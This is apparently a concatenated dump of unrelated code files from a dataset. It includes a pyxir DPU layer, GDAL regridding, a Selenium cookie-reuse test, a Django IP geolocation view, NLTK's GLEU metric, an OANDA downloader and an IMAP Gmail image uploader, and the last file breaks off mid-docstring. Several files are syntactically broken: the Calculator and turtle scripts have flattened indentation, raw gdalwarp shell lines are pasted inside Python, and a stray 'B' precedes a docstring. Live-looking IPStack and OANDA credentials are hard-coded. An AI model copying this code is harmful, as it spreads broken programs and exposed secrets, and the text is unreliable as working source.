# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Module for registering Numpy DPU runtime layer """
import os
import json
import logging
import warnings
import numpy as np
import pyxir
from pyxir.runtime import base
from pyxir.runtime.rt_layer import BaseLayer
logger = logging.getLogger('pyxir')
class DPULayer(BaseLayer):
    """Numpy runtime layer that offloads execution to a Vitis-AI DPU runner."""

    # Resolve the Vitis-AI runner at class-definition time; a warning (not a
    # hard failure) is raised when the runtime is absent.
    try:
        from pyxir.contrib.vai_runtime.runner import Runner
    except:
        warnings.warn("Could not import Vitis-AI Runner")

    def init(self):
        """Validate the layer attributes and create the DPU runner.

        Exactly one input and at least one output are expected; the runner
        is built from the compiled model in ``attrs['work_dir']``.
        """
        # Setup
        input_names = self.attrs['input_names']
        assert(len(input_names) == 1)
        output_names = self.attrs['output_names']
        assert(len(output_names) >= 1)
        self.runner = self.Runner(self.attrs['work_dir'])
        logger.debug("SHAPE: {}".format(self.shape))

    def forward_exec(self, inputs):
        # type: (List[numpy.ndarray]) -> numpy.ndarray
        """Run one batch-1 inference on the DPU and return the outputs.

        Allocates float32 host buffers matching the runner's tensor shapes,
        copies the single input in, executes asynchronously and waits.
        """
        # For now
        assert(len(inputs) == 1)
        assert(inputs[0].shape[0] == 1)  # only batch size 1 is supported
        X = inputs[0]
        res = []
        inTensors = self.runner.get_input_tensors()
        outTensors = self.runner.get_output_tensors()
        batch_sz = 1
        # Pre-allocate C-ordered float32 blobs for inputs and outputs,
        # replacing each tensor's leading dimension with the batch size.
        fpgaBlobs = []
        for io in [inTensors, outTensors]:
            blobs = []
            for t in io:
                shape = (batch_sz,) + tuple([t.dims[i] for i in range(t.ndims)][1:])
                blobs.append(np.empty((shape), dtype=np.float32, order='C'))
            fpgaBlobs.append(blobs)
        fpgaInput = fpgaBlobs[0][0]
        np.copyto(fpgaInput[0], X[0])
        jid = self.runner.execute_async(fpgaBlobs[0], fpgaBlobs[1])
        self.runner.wait(jid)
        # NOTE(review): only the first output blob is returned even though
        # multiple output names are allowed above — confirm intent.
        res.append(fpgaBlobs[1][0])
        return tuple(res)

    def __del__(self):
        """
        Cleanup DPU resources
        """
        del self.runner
pyxir.register_op('cpu-np', 'DPU', base.get_layer(DPULayer))
|
17,086 | 8730e15d45b3a976808d2eaec9ced06478e8141c | class Calculator:
C = 10
def add(self, a, b):
return a + b
    @staticmethod
    def info():
        """Print a short informational message about the class."""
        print("This is info class")
cal = Calculator()
# print(cal.add(10, 30))
# cal.info()
Calculator.info()
|
17,087 | 3623eb889f2f46e64d5c20f1a2b78118b9b28118 | import gdal
import subprocess
import psycopg2
import glob
import shutil
inputFolder = "/media/lancer/TOSHIBA/MODIS Terra/"
cutFolder = "/media/lancer/TOSHIBA/MODIS Terra Cut/"
def re_griding(inputfile, resx, resy, ouputfile):
    """Warp ``inputfile`` onto a regular WGS84 lon/lat grid with gdalwarp.

    resx/resy are the target pixel sizes (degrees); the output window is
    fixed to roughly 100.1-111.8 E, 6.4-25.6 N.  The warped raster is
    written to ``ouputfile`` (parameter name kept for compatibility).
    """
    regrid_command = "gdalwarp -t_srs '+proj=longlat +datum=WGS84' -tps -ot Float32 -wt Float32 -te 100.1 6.4 111.8 25.6 -tr {0} {1} -r cubic -srcnodata -9999 -dstnodata -9999 -overwrite -multi {2} {3}"
    # BUG FIX: the original called os.system() but `os` is never imported in
    # this module (NameError at runtime); use the already-imported subprocess.
    # NOTE(review): paths are interpolated into a shell string — quoting and
    # injection safety are the caller's responsibility.
    subprocess.call(regrid_command.format(resx, resy, inputfile, ouputfile), shell=True)
gdalwarp -t_srs '+proj=longlat +datum=WGS84' -tps -ot Float32 -wt Float32 -te 100.1 6.4 111.8 25.6 -srcnodata -9999 -dstnodata -9999 -overwrite -multi HDF4_EOS:EOS_GRID:"MOD08_D3.A2016032.006.2016034014959.hdf":mod08:Retrieved_Temperature_Profile_Standard_Deviation out.tif
gdalwarp -te 100.1 6.4 111.8 25.6 -srcnodata -9999 -dstnodata -9999 -overwrite -multi HDF4_EOS:EOS_GRID:"MOD08_D3.A2016032.006.2016034014959.hdf":mod08:Aerosol_Optical_Depth_Land_Ocean_Mean out2.tif
gdal_translate -of GTiff HDF4_EOS:EOS_GRID:"MOD08_D3.A2015001.006.2015035160108.hdf":mod08:Aerosol_Optical_Depth_Land_Ocean_Mean modis_ds12.tif
gdal_translate -of GTiff HDF4_EOS:EOS_GRID:"MOD11A1.A2008006.h16v07.005.2008007232041.hdf":MODIS_Grid_Daily_1km_LST:Clear_night_cov modis_ds12.tif
gdal_translate -of GTiff HDF4_EOS:EOS_GRID:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":mod04:Optical_Depth_Land_And_Ocean modis_ds12.tif
gdalinfo MOD04_L2.A2015333.0254.006.2015333030251.hdf
gdal_translate -of GTiff HDF4_EOS:EOS_SWATH:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":Swath00:Optical_Depth_Land_And_Ocean modis_ds12.tif
HDF4_EOS:EOS_SWATH:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":Swath00:Optical_Depth_Land_And_Ocean
gdalwarp -t_srs '+proj=longlat +datum=WGS84' -tps -ot Float32 -wt Float32 -te 100.1 6.4 111.8 25.6 -srcnodata -9999 -dstnodata -9999 -overwrite -multi HDF4_EOS:EOS_SWATH:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":Swath00:Optical_Depth_Land_And_Ocean out123.tif |
17,088 | d8e83733147204c89654aad7afb86fb42e758763 | import json
from time import sleep
from typing import Dict, List
from selenium import webdriver
from selenium.webdriver.common.by import By
class Test_one():
    """Selenium smoke test that reuses a saved cookie to enter the
    WeChat Work admin console (attaches to a debugging Chrome)."""

    def setup(self):
        """Attach to an already-running Chrome (remote debugging port 9222)
        and open the WeChat Work landing page."""
        option = webdriver.ChromeOptions()
        option.debugger_address = "127.0.0.1:9222"
        self.driver = webdriver.Chrome(options=option)
        self.driver.implicitly_wait(3)
        self.driver.get('https://work.weixin.qq.com/')

    def test_one(self):
        """Load cookies from cookie.txt, inject them and open the admin frame."""
        # Elements of the reused page can be located directly here.
        #self.driver.find_element(By.XPATH, '//*//*[@id="_hmt_click"]/div[1]/div[4]/div[2]/a[1]').click()
        # self.driver.find_element(By.XPATH,'//*[@id="indexTop"]/div[2]/aside/a[1]').click()
        # sleep(6)
        # cookie = self.driver.get_cookies()
        # with open("cookie.txt", 'w') as f:
        #     json.dump(cookie, f)
        # print('写入时的cookie:' + str(cookie))
        with open("cookie.txt", 'r') as f:
            # print("从文件中读cookie:"+str(json.load(f)))
            cookies: List[Dict] = json.load(f)
            for cookie in cookies:
                # Selenium's add_cookie rejects the 'expiry' key here, so
                # strip it before injecting.
                if 'expiry' in cookie.keys():
                    cookie.pop('expiry')
                self.driver.add_cookie(cookie)
        self.driver.get('https://work.weixin.qq.com/wework_admin/frame#index')
        self.driver.find_element(By.XPATH, '//*//*[@id="_hmt_click"]/div[1]/div[4]/div[2]/a[1]').click()
        self.driver.find_element(By.ID, 'username').send_keys('qazse4')
|
17,089 | 80479066ebca14b499142ee81878bc24b4c73b32 | from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework import status
from django.core.cache import cache
from api.serializers import IPAddressSerializer, IPAddressGetSerializer
from api.models import IPAddress
ACCESS_KEY = '0a2d26de06ac50376c6e9508e00ffbe5'
# Function for accessing IPStack
def ip_find(address):
    """Look up geolocation data for ``address`` via the IPStack HTTP API.

    Returns the decoded JSON payload.  Raises requests.Timeout if IPStack
    does not answer within 10 seconds (the original request could hang the
    serving thread indefinitely because no timeout was set).
    """
    import requests
    url = 'http://api.ipstack.com/{}'.format(address)
    print(url)  # debug trace of the outgoing request URL
    params = {"access_key": ACCESS_KEY}
    # A timeout keeps a stalled upstream call from blocking the view forever.
    response = requests.get(url, params=params, timeout=10)
    return response.json()
@api_view(['GET'])
def index(request):
    """Resolve an IP address to geolocation data.

    Lookup order: 60-second cache -> database -> IPStack API (result is
    then persisted and cached).

    NOTE(review): several branches fall through without returning (cache
    hit with an invalid serializer; invalid request serializer), ending at
    the bare 200 response with no body — confirm this is intended.
    """
    if request.method == 'GET':
        # serializer for getting IP address
        serializer = IPAddressGetSerializer(data=request.data)
        if serializer.is_valid():
            address = serializer.data['address']
            # get ip address data from cache
            data = cache.get(address)
            if data:
                # pass data into serializer so we can return as JSON
                serialized_data = IPAddressSerializer(data=data)
                if serialized_data.is_valid():
                    return Response(serialized_data.data, status=status.HTTP_200_OK)
            else:
                # Cache miss: look in the database next.
                try:
                    ip = IPAddress.objects.get(address=address)
                except IPAddress.DoesNotExist:
                    ip = None
                if ip is not None:
                    serialized_data = IPAddressSerializer(ip)
                    cache.set(address, serialized_data.data, 60)
                    return Response(serialized_data.data, status=status.HTTP_200_OK)
                else:
                    # Not known locally: query IPStack and persist the result.
                    response = ip_find(address)
                    data = {
                        "address": response['ip'],
                        "continent": response['continent_name'],
                        "country": response['country_name'],
                        "state": response['region_name'],
                        "latitude": response['latitude'],
                        "longitude": response['longitude']
                    }
                    serialized_data = IPAddressSerializer(data=data)
                    if serialized_data.is_valid():
                        serialized_data.save()
                        cache.set(address, serialized_data.data, 60)
                        return Response(serialized_data.data, status=status.HTTP_200_OK)
                    else:
                        return Response(serialized_data.errors, status=status.HTTP_400_BAD_REQUEST)
    return Response(status=status.HTTP_200_OK)
|
17,090 | 2176af4275e2a38b52b7f1d90f06350c8aefe520 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 6 15:38:12 2016
compare the telemetered data with raw data for each profile
@author: yifan
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from turtleModule import str2ndlist,np_datetime
from gettopo import gettopo
def find_start(a, List):
    """Locate one dive in a depth series.

    Starting from index ``a`` (expected to be a surface sample, depth < 2),
    find the last surface sample before the descent and the first surface
    sample after the ascent.  Returns ``[start, end]`` indices into
    ``List``; defaults keep the original fallback of ``len(List) - 3``.
    """
    start = len(List) - 3
    if List[a] < 2:
        # Walk forward for the last shallow (<2) sample that is followed by
        # two strictly increasing samples crossing the 2-metre threshold.
        for i in range(a, len(List) - 2):
            descending = List[i] < List[i + 1] and List[i] < 2
            crossing = List[i + 1] < List[i + 2] and List[i + 1] >= 2
            if descending and crossing:
                start = i
                break
    # From there, find the first sample back above the surface line while
    # the depth keeps decreasing (end of the ascent).
    for i in range(start, len(List) - 2):
        if List[i] >= 2 and List[i] > List[i + 1]:
            if List[i + 1] < 2 and List[i + 1] > List[i + 2]:
                break
    return [start, i + 1]
def closest_time(time, timelist, i=0):
    '''
    Return index of the closest time in the list

    Binary-search style recursion; ``i`` accumulates the offset of the
    current slice within the original list.  Returns the string 'null'
    for an empty list, and clamps to 0 / len-1 when ``time`` lies outside
    the list's range.

    NOTE(review): the base case assumes the recursion always reaches a
    slice of exactly 2 elements (index == 2); timelist is presumably
    sorted ascending — confirm with the callers below.
    '''
    index = len(timelist)
    indx = int(index/2)
    if timelist==[]:
        return 'null'
    if time>timelist[-1]:
        return len(timelist)-1
    if time<timelist[0]:
        return 0
#        return 'out'#raise Exception('{0} is not in {1}'.format(str(time), str(timelist)))
    if index == 2:
        # Two candidates left: pick whichever is nearer to `time`.
        l1, l2 = time-timelist[0], timelist[-1]-time
        if l1 < l2:
            i = i
        else:
            i = i+1
    elif time == timelist[indx]:
        i = i + indx
    elif time > timelist[indx]:
        # Recurse into the upper half, carrying the slice offset.
        i = closest_time(time, timelist[indx:],
                         i=i+indx)
    elif time < timelist[indx]:
        # Recurse into the lower half (inclusive of the midpoint).
        i = closest_time(time, timelist[0:indx+1], i=i)
    return i
###########################################################################
obsData = pd.read_csv('ctdWithModTempByDepth.csv')
tf_index = np.where(obsData['TF'].notnull())[0] # get the index of good data
obsturtle_id=pd.Series(obsData['PTT'][tf_index],index=tf_index)
secondData=pd.read_csv('12487_location.csv')
tf_index1 = np.where(secondData['index'].notnull())[0]
tf_index2 =range(len(tf_index1))
time=pd.Series(secondData['time'],index=tf_index1)
depth=pd.Series(secondData['depth'],index=tf_index1)
temp=pd.Series(secondData['temp'],index=tf_index1)
inde=pd.Series(secondData['index'],index=tf_index1)
time.index=tf_index2
depth.index=tf_index2
temp.index=tf_index2
inde.index=tf_index2
indx=[]
for i in tf_index:
if obsturtle_id[i]==118905: #this turtle is same turtle with 4-second turtle
indx.append(i)
obsLon, obsLat = obsData['LON'][indx], obsData['LAT'][indx]
obsTime = pd.Series(np_datetime(obsData['END_DATE'][indx]), index=indx)
obsTemp = pd.Series(str2ndlist(obsData['TEMP_VALS'][indx]), index=indx)
obsDepth = pd.Series(str2ndlist(obsData['TEMP_DBAR'][indx]), index=indx)
Waterdepth=[]
for i in indx:
wd=-gettopo(obsLat[i],obsLon[i])
Waterdepth.append(wd)
Waterdepth=pd.Series(Waterdepth, index=indx)
for i in indx[0:2]:
waterdepth=Waterdepth[i]
print 'waterdepth: '+ str(waterdepth)
Index_all=[] #find indices which are in same area
for j in tf_index2:
if i==inde[j]:
Index_all.append(j)
newdepth=pd.Series(depth,index=Index_all)
newdepth.index=range(len(Index_all))
newtime=pd.Series(time,index=Index_all)
newtime.index=range(len(Index_all))
newtime=pd.to_datetime(newtime)
Index=[] # all dives for each profile
for k in range(len(newdepth)):
if newdepth[k]<2:
I=find_start(k,newdepth)
Index.append(I)
Index = [list(x) for x in set(tuple(x) for x in Index)]
Index.sort()
INdex=[] # all upcast index for each profile
top_time=[] #the time of end of one upcast
for k in range(len(Index)):
max_depth=max(newdepth[Index[k][0]:Index[k][1]+1])
bottom=[]
for j in range(Index[k][0],Index[k][1]+1):
if newdepth[j]==max_depth:
#if newdepth[j]>=waterdepth*0.7:
bottom.append(j)
if bottom==[]:
pass
else:
INdex.append([bottom[-1],Index[k][1]])
top_time.append(newtime[Index[k][1]])
N=closest_time(obsTime[i],top_time) #find the nearst index of upcast with profile.
if N=='null':
print str(i)+' do not dive to 70% of bottom of ocean'
pass
else:
for k in range(len(Index_all)):
if k==INdex[N][0]:
down=Index_all[k] #the clostest bottom index
if k==INdex[N][1]:
up=Index_all[k] #the clostest top index
print i
plt.figure()
plt.plot(temp[down:up],depth[down:up],'r',label='raw',linewidth=2)
plt.plot(obsTemp[i],obsDepth[i],'b', label='telemetered',linewidth=2)
plt.xlim([0, 30])
plt.ylim([max(obsDepth[i])+3, -1])
plt.xlabel('Temp', fontsize=10)
plt.ylabel('Depth', fontsize=10)
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.legend(loc='lower right')
plt.title(i,fontsize=14)
plt.text(1,0,'time:'+str(obsTime[i])+'')
plt.text(1,1,'location:'+str(round(obsLon[i],2))+', '+str(round(obsLat[i],2))+'')
plt.text(1,2,'waterdepth: '+ str(waterdepth)+'')
#plt.savefig('%s.png'%(i))
plt.show()
|
17,091 | d5e2df78c84ae4e248cd6d7b6b034820edbee623 | import json
from oandapyV20 import API
import pandas as pd
import numpy
from oandapyV20.contrib.factories import InstrumentsCandlesFactory
import csv
# OANDA v20 REST client.
# NOTE(review): the access token is hard-coded -- move it to an environment
# variable or config file before sharing or committing this script.
client = API(access_token='49c68257ae0870c5b76bbe63d4c79803-bc876dfcc6b0ebcc31ef73e45ebdbab8')
# One year of hourly GBP/USD candles.
instrument, granularity = "GBP_USD", "H1"
_from = "2019-01-01T00:00:00Z"
_to = "2020-01-01T00:00:00Z"
params = {
    "from": _from,
    "granularity": granularity,
    "to": _to
}
# Stream the full history into one JSON file (e.g. "GBP_USDHourly.H1").
with open("//Users/user/PycharmProjects/LaureateForex/{}.{}".format(instrument+"Hourly", granularity), "w") as OUT:
    #
    # reader = csv.DictReader((open("//Users/user/PycharmProjects/LaureateForex/{}.csv")))
    # for raw in reader:
    #     print(raw)
    # The factory returns a generator generating consecutive
    # requests to retrieve full history from date 'from' till 'to'
    for r in InstrumentsCandlesFactory(instrument=instrument,params=params):
        client.request(r)
        OUT.write(json.dumps(r.response.get('candles'), indent=2))
# NOTE(review): the "{}" placeholder below is never filled in (no
# .format(...) call), so this open() always raises, and the handle is never
# closed on success. Looks like leftover debug code -- confirm intent
# before fixing.
try:
    my_file_handle=open("//Users/user/PycharmProjects/LaureateForex/{}.csv")
except IOError:
    print("File not found or path is incorrect")
finally:
    print("exit")
17,092 | 101c6e6f7d08f57b2bdd9b0a57b45c30bd06aec2 | # Natural Language Toolkit: GLEU Score
#
# Copyright (C) 2001-2023 NLTK Project
# Authors:
# Contributors: Mike Schuster, Michael Wayne Goodman, Liling Tan
# URL: <https://www.nltk.org/>
# For license information, see LICENSE.TXT
""" GLEU score implementation. """
from collections import Counter
from nltk.util import everygrams, ngrams
def sentence_gleu(references, hypothesis, min_len=1, max_len=4):
    """Sentence-level GLEU (Google-BLEU) score from Wu et al. (2016),
    "Google's Neural Machine Translation System" (arXiv:1609.08144).

    GLEU records every n-gram of order ``min_len`` through ``max_len`` in
    the hypothesis and in each reference, then takes the minimum of n-gram
    precision and n-gram recall against the best-matching reference. The
    score always lies in [0, 1] (0 = no matching n-grams, 1 = all match)
    and is symmetric when hypothesis and reference are swapped, which makes
    it better suited to single sentences than BLEU.

    This is a thin wrapper: it wraps the single sentence pair into a
    one-element "corpus" and delegates to :func:`corpus_gleu`.

    :param references: reference sentences, each a list of tokens
    :type references: list(list(str))
    :param hypothesis: hypothesis sentence, a list of tokens
    :type hypothesis: list(str)
    :param min_len: the smallest n-gram order to extract
    :type min_len: int
    :param max_len: the largest n-gram order to extract
    :type max_len: int
    :return: the sentence-level GLEU score
    :rtype: float
    """
    single_ref_corpus = [references]
    single_hyp_corpus = [hypothesis]
    return corpus_gleu(
        single_ref_corpus, single_hyp_corpus, min_len=min_len, max_len=max_len
    )
def corpus_gleu(list_of_references, hypotheses, min_len=1, max_len=4):
    """Corpus-level GLEU score over all hypothesis/reference pairs.

    Rather than averaging per-sentence GLEU scores, the matching-n-gram
    counts and the ``max(|hyp ngrams|, |ref ngrams|)`` denominators are
    summed over the whole corpus first and divided once at the end (per
    Wu et al., 2016 / Mike Schuster), so longer sentences weigh more.
    For each sentence, the single reference yielding the highest ratio is
    the one whose counts enter the corpus totals.

    Note: ``min(precision, recall)`` shares its numerator between both
    ratios, so it equals ``matches / max(hyp_total, ref_total)`` -- only
    the larger denominator is needed.

    :param list_of_references: reference sentences, one list per hypothesis
    :type list_of_references: list(list(list(str)))
    :param hypotheses: hypothesis sentences, each a list of tokens
    :type hypotheses: list(list(str))
    :param min_len: the smallest n-gram order to extract
    :type min_len: int
    :param max_len: the largest n-gram order to extract
    :type max_len: int
    :return: the corpus-level GLEU score
    :rtype: float
    """
    assert len(list_of_references) == len(
        hypotheses
    ), "The number of hypotheses and their reference(s) should be the same"

    total_match = 0
    total_all = 0
    for refs, hyp in zip(list_of_references, hypotheses):
        hyp_counter = Counter(everygrams(hyp, min_len, max_len))
        n_hyp = sum(hyp_counter.values())  # true positives + false positives

        # Track the best-scoring reference as (score, matches, denominator);
        # ties keep the earliest reference, matching max()'s behaviour.
        best = None
        for ref in refs:
            ref_counter = Counter(everygrams(ref, min_len, max_len))
            n_ref = sum(ref_counter.values())  # true positives + false negatives
            n_overlap = sum((ref_counter & hyp_counter).values())  # true positives
            denom = max(n_hyp, n_ref)
            if denom == 0:
                # Both sides empty (e.g. empty reference); contributes nothing.
                continue
            score = n_overlap / denom
            if best is None or score > best[0]:
                best = (score, n_overlap, denom)

        if best is not None:
            total_match += best[1]
            total_all += best[2]

    # Empty corpus / all-empty references: avoid dividing by zero.
    return total_match / total_all if total_all else 0.0
|
17,093 | bc6c4875c1f5eb5369db0c312c5b8c540a5bad69 | """
URLs for the wagtail admin dashboard.
"""
from django.urls import path
from wagtailcache.views import clear
from wagtailcache.views import index
# Route table for the cache admin pages: the dashboard at the app root and
# the cache-clearing action at /clearcache. Route names ("index",
# "clearcache") are used for reverse() lookups.
urlpatterns = [
    path("", index, name="index"),
    path("clearcache", clear, name="clearcache"),
]
|
17,094 | 92827a868d83caefbe42437b46c5916eaf0fce7b | from typing import List
from omtools.core.variable import Variable
from omtools.core.input import Input
def collect_input_exprs(
    inputs: list,
    root: Variable,
    expr: Variable,
) -> List[Variable]:
    """
    Collect input nodes so that the resulting ``ImplicitComponent`` has
    access to inputs outside of itself.

    Walks ``expr``'s dependency graph depth-first, appending to ``inputs``
    every leaf ``Input`` node (an ``Input`` with no dependencies of its
    own). Dependencies whose name matches ``root``'s are skipped entirely,
    including their subtrees.

    :param inputs: accumulator list, mutated in place and also returned
    :param root: the variable whose name marks the recursion boundary
    :param expr: the expression whose dependencies are traversed
    :return: ``inputs``, with the collected leaf ``Input`` nodes appended
    """
    for dependency in expr.dependencies:
        # Do not descend into (or past) the root variable itself.
        if dependency.name == root.name:
            continue
        # A leaf Input node (no further dependencies) is an external input.
        # (Was `isinstance(...) == True and len(...) == 0` -- same logic,
        # idiomatic truthiness.)
        if isinstance(dependency, Input) and not dependency.dependencies:
            inputs.append(dependency)
        inputs = collect_input_exprs(inputs, root, dependency)
    return inputs
|
17,095 | 67fe5fded35c9a5d4209de75e6c5cecf967cf4e9 | import os, argparse
import tensorflow as tf
from tensorflow.python.framework import graph_util
from tensorflow import keras
from os import listdir
from os.path import isfile, isdir, join
if __name__ == '__main__':
    # Raw string literal: the original "I:\dataSet..." contained the
    # invalid escape sequence "\d" (a warning on modern Python, slated to
    # become an error); the resulting string value is byte-identical.
    mypath = r"I:\dataSet/training dataset"
    # Fetch every file and sub-directory name under the dataset root.
    dfiles = listdir(mypath)
    # Print each entry name, title-cased.
    for f in dfiles:
        # Absolute path of the entry (kept from the original, still unused):
        # fullpath = join(mypath, f)
        print(f.title())
|
17,096 | ef7fb657938868481371ad34c6b52f291464a6a5 | B'''
Created on Nov 15, 2010
@0;278;0cauthor: surya
'''
import os
import sys
import time
import json
import email
import rfc822
import pycurl
import imaplib
import logging
import cStringIO
import string
from ImageUtils.ImageCache import ImageCache
from ImageUtils.sampleExifN80 import get_original_datetime_N80
from Logging.Logger import getLog
from Locking.AppLock import getLock
from IANAGmailSettings.Settings import setting
from GmailMonitorFramework.GmailMonitorFramework import GmailMonitorFramework
from email.mime.text import MIMEText
import datetime
class IANAGmailMonitor(GmailMonitorFramework):
    ''' This class implements the functionality to poll gmail accounts for
        image data, and uploads it to the SuryaWebPortal to be stored in
        the database for subsequent Image Analysis.

        NOTE(review): this module targets Python 2 (rfc822, cStringIO).
    '''

    def __init__(self):
        ''' Constructor: sets up the on-disk cache for mail attachments. '''
        self.imcache = ImageCache('/home/surya/imagecache')

    @staticmethod
    def remove_undecodable_from_dict(inputDict):
        '''Remove any (k, v) which contains characters json can not decode.

        Mutates ``inputDict`` in place and also returns it. Keys and values
        are assumed to be strings -- TODO confirm for non-string values.
        '''
        # move this function to some general util library?
        poplist = []
        for (k, v) in inputDict.items():
            try:
                json.encoder.encode_basestring_ascii(k)
            except UnicodeDecodeError:
                poplist.append(k)
                continue
            try:
                json.encoder.encode_basestring_ascii(v)
            except UnicodeDecodeError:
                poplist.append(k)
        for p in poplist:
            inputDict.pop(p)
        return inputDict

    def checkInbox(self):
        ''' Refer GmailMonitorFramework.checkInbox for documentation.

        Polls the configured Gmail inbox over IMAP, extracts image
        attachments plus key:value config lines from the mail body, and
        uploads each image via HTTP POST (pycurl) to the configured URL.

        :raises RuntimeError: if login or INBOX selection fails.
        '''
        tags = self.gmontags + " IANA"
        self.log.info("Checking Gmail... {0}".format(str(setting.get("poll_interval"))), extra=tags)
        gmailConn = imaplib.IMAP4_SSL(setting.get("imap_host"), setting.get("imap_port"))

        # Login: ('OK', ['20'])
        (status, rsps) = gmailConn.login(setting.get("username"), setting.get("password"))
        if status == 'OK':
            self.log.info("Login successfully username: " + setting.get("username"), extra=tags)
        else:
            self.log.error("Login fail." + str(status) + ":" + str(rsps), extra=tags)
            # FIX: raising a plain string is a TypeError since Python 2.6;
            # raise a real exception instance instead.
            raise RuntimeError('Gmail Login Failed')

        # Select INBOX: ('OK', ['20'])
        (status, rsps) = gmailConn.select("INBOX")
        if status == 'OK':
            self.log.info("Selecting INBOX successfully.", extra=tags)
        else:
            self.log.error("Cannot select INBOX" + str(status) + ":" + str(rsps), extra=tags)
            raise RuntimeError('Inbox Selection Failed')

        # Search UNSEEN UNDELETED: ('OK', ['1 2 3 ... 19'])
        (status, rsps) = gmailConn.search(None, "(UNSEEN UNDELETED)")
        mailIds = rsps[0].split()
        if status == 'OK':
            # FIX: the original conditional bound to the whole concatenation
            # ("A + B if cond else ''"), so the entire message vanished when
            # no new mail was found; parenthesize only the optional suffix.
            self.log.info("Finding {0:s} new emails.".format(str(len(mailIds))) +
                          (("unprocessed mail ids: " + rsps[0]) if len(mailIds) else ""), extra=tags)
        else:
            self.log.error("Errors while searching (UNSEEN UNDELETED) mails." + str(status) + ":" + str(rsps), extra=tags)
            return 'Errors searching for Unseen mails'

        for mid in mailIds:
            (status, rsps) = gmailConn.fetch(mid, '(RFC822)')
            if status == 'OK':
                self.log.info("Successfully fetching mail (mail id:{0:s})...".format(str(mid)), extra=tags)
            else:
                self.log.error("Errors while fetching mail (mail id:{0:s})...".format(str(mid)), extra=tags)
                continue

            mailText = rsps[0][1]
            mail = email.message_from_string(mailText)
            fromField = rfc822.parseaddr(mail.get("FROM").lower())[1]
            toField = rfc822.parseaddr(mail.get("TO").lower())[1]
            subjectField = mail.get("SUBJECT")  # should be szu###
            if "Result" in subjectField:
                continue
            # TODO: add spam detection: only from "surya." with subject "szu" is considered valid.
            self.log.info("The mail (id: {0:s}) is from: <{1:s}> and to: <{2:s}> with subject: {3:s}"
                          .format(str(mid), fromField, toField, subjectField), extra=tags)

            configDict = {"fromemail": fromField, "toemail": toField}
            isImage = False

            # Walk the MIME parts: text/plain parts carry "key: value"
            # config lines; attachment parts carry the image payload.
            parts = mail.walk()
            for p in parts:
                if 'text/plain' in p.get_content_type():
                    message = p.get_payload(decode=True)
                    self.log.info('payload: ' + str(message), extra=tags)
                    if message is not None:
                        configParams = [v.split(':', 1) for v in message.splitlines() if ':' in v]
                        for param in configParams:
                            configDict[param[0].strip().lower()] = param[1].strip(string.punctuation + ' ').lower()
                    continue
                if p.get_content_maintype() != 'multipart' and p.get('Content-Disposition') is not None:
                    fdata = p.get_payload(decode=True)
                    filename = p.get_filename()
                    configDict['origfilename'] = filename
                    # Store the file in the file cache
                    self.log.info("Storing file: " + filename)
                    picFileName = self.imcache.put(filename, fdata)
                    if picFileName is None:
                        self.log.error('Could Not save ' + filename + ' in the cache', extra=tags)
                        continue
                    # Reading EXIF info; fall back to "now" if unavailable.
                    (status, pic_datetime_info) = get_original_datetime_N80(picFileName)
                    if status:
                        self.log.info("From Exif metadata, the picture {0:s} is taken at {1:s}"
                                      .format(picFileName, pic_datetime_info.strftime("%Y,%m,%d,%H,%M,%S")).replace(',0', ','), extra=tags)
                    else:
                        self.log.error("Cannot get original datetime from picture: " + picFileName + "details: " + str(pic_datetime_info), extra=tags)
                        pic_datetime_info = datetime.datetime.now()
                        #self.imcache.remove(filename) #set the current datetime
                        #continue # try next part
                    isImage = True

            if isImage:
                # Check for invalid characters in dictionary that json convertor can not handle
                configDict = IANAGmailMonitor.remove_undecodable_from_dict(configDict)
                message = json.dumps(configDict)
                # Upload to http server
                response = cStringIO.StringIO()
                curl = pycurl.Curl()
                curl.setopt(curl.WRITEFUNCTION, response.write)
                curl.setopt(curl.POST, 1)
                curl.setopt(curl.URL, setting.get("upload_url"))
                curl.setopt(curl.HTTPPOST, [
                    ("device_id", fromField),
                    ("aux_id", ""),  # TODO: using CronJob to read QR code
                    ("misc", message),  # not used
                    # change 08->8, otherwise the server will complain because
                    # we cannot run datetime(2010,08,23,18,1,1)
                    ("record_datetime", pic_datetime_info.strftime("%Y,%m,%d,%H,%M,%S").replace(',0', ',')),
                    #("gps", ""), #not used # needs to change to three post values instead of one
                    ("datatype", "image"),
                    ("mimetype", "image/jpeg"),
                    ("version", setting.get("http_post_version")),
                    ("deployment_id", toField[0:toField.index('@')]),  # e.g. surya.pltk1 ("from email")
                    ("tag", ""),  # not used
                    ("data", (curl.FORM_FILE, picFileName))
                ])
                curl.perform()
                self.log.info("Running http post to: " + setting.get("upload_url"), extra=tags)
                server_rsp = str(response.getvalue())
                curl.close()
                if str(server_rsp).startswith("upok"):
                    self.log.info("Successfully Uploading." + str(server_rsp), extra=tags)
                else:
                    self.log.error("The server returns errors." + str(server_rsp), extra=tags)
                self.imcache.remove(filename)
                self.log.info("Deleting uploaded temporary file: " + str(picFileName), extra=tags)

        gmailConn.close()
        gmailConn.logout()
# Script entry point: optional argv[1] overrides the default 10-second
# polling interval handed to GmailMonitorFramework.run().
if __name__ == '__main__':
    runinterval = 10
    if len(sys.argv) > 1:
        runinterval = int(sys.argv[1])
    gmon = IANAGmailMonitor()
    gmon.run("IANAGmailMonitor.pid", "IANAGmailMonitor", runinterval)
|
17,097 | 2d844dad3a8931b8da6946c3502cef466e0f0b80 | from tensorflow.keras.optimizers import Adam, SGD, RMSprop
from config import emotion_config as config
from hdf5datasetgenerator import HDF5DatasetGenerator
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from emotionModel import EmotionDetectModel
from emotionModelTransfer import TranserLearningModel
from utils.imagetoarraypreprocess import ImageToArrayPreprocess
from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, Callback
from utils.trainmonitor import TrainingMonitor
import tensorflow as tf
import matplotlib.pyplot as plt
import argparse
import os
class EarlyStopTraining(Callback):
    """Keras callback that halts training once training accuracy hits 90%.

    Fixes the mutable-default-argument anti-pattern in the original
